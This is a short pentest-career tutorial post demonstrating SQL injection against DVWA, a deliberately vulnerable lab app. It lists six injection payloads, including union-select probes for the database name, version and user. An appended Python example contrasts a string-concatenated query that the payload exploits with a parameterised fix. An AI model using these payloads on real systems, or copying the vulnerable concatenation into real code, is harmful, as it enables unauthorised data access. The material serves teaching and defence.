Tips for an Information Security Analyst/Pentester career - Episode 9: DVWA (SQL injection)
- The following SQL injection attacks were run on a deliberately vulnerable virtual machine for demonstration purposes only. Don't attempt them on systems you don't have authorization for, otherwise you're in for a spot in a Federal jail. You've been warned!!
- For these attacks to succeed, you need to set DVWA's security level to Low, otherwise they won't run. The whole point of DVWA is to show the impact of common attacks and how mitigation techniques can help prevent them from being exploited.
In this post, we're gonna have fun with some SQL injection attacks.
- First injection: ' or 1=1 #
- Second injection: 'OR '1'='1' -- ';
- Third injection: 1' order by 1 #
- Fourth injection: 1' or 1=1 order by 1 #
- Fifth injection: ' and 1=1 union select database(),version() #
- Sixth injection: ' and 1=1 union select null,user() #
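As an added example that is not part of the original post: the query shape DVWA's low-security SQLi page builds (assumed here to be `SELECT first_name, last_name FROM users WHERE user_id = '<input>'`) recreated in Python against an in-memory SQLite table, with the post's second injection run once through string concatenation and once through a bound parameter. SQLite ends a comment with `--`, not MySQL's `#`, so the `#`-terminated payloads above would not parse here; the table rows are constructed.

```python
import sqlite3

def make_db():
    """Constructed sample table mirroring the shape of DVWA's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")],
    )
    return conn

def lookup_vulnerable(conn, user_id):
    # Low-security pattern: the request value is pasted straight into the SQL
    # text, so a quote in the input changes the structure of the statement.
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()

def lookup_safe(conn, user_id):
    # Mitigation: the statement is fixed and the value travels as a bound
    # parameter; the driver never interprets it as SQL, quotes included.
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()

# The post's second injection; "--" comments out the trailing quote.
PAYLOAD = "' OR '1'='1' -- '"

def demo():
    """Row counts for: a normal lookup, the injected vulnerable lookup,
    and the same payload passed through the parameterised lookup."""
    conn = make_db()
    normal = lookup_vulnerable(conn, "1")      # one row, as intended
    dumped = lookup_vulnerable(conn, PAYLOAD)  # WHERE becomes always-true: every row
    safe = lookup_safe(conn, PAYLOAD)          # payload is just an odd user_id: no rows
    return len(normal), len(dumped), len(safe)

if __name__ == "__main__":
    print(demo())
```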